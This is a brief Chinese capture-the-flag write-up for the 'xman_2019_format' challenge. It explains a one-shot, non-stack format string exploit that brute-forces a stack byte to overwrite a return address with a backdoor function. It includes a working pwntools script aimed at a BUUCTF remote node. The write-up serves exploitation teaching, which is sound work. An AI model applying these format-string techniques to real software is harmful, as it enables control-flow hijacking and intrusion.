xman_2019_format(非栈上格式化字符串仅一次利用的爆破)

首先检查一下程序的保护机制

然后用IDA分析一下

存在一个后门函数

s执行的内存是非栈上，这类格式化字符串漏洞，一般需要先泄露栈地址，但是这里无法做到，如果泄露了，第二次也没机会来再次利用了。因为这里是一次输入，分步执行。没有循环的交互。因此，最简单的方法是爆破栈的低1字节。通过栈上已有的数据，在栈上布下一个指向函数返回地址栈的指针，然后劫持返回地址栈。

#coding:utf8
from pwn import *

#sh = process('./xman_2019_format')
sh = remote('node3.buuoj.cn',27216)
elf = ELF('./xman_2019_format')
backdoor = 0x080485AB
#假设$14栈的数据低一字节为0x98，则爆破，成功率1/16，实际上几率更高
stack_guess = 0x98

#修改$18为$30-0x4C，也就是函数返回地址值
payload = '%' + str(stack_guess-0x4C) + 'c%10$hhn|'
#在栈上$31布置printf的got低2字节地址
payload += '%' + str(backdoor & 0xFFFF) + 'c%18$hn|'
sh.sendafter('...',payload)

sh.interactive()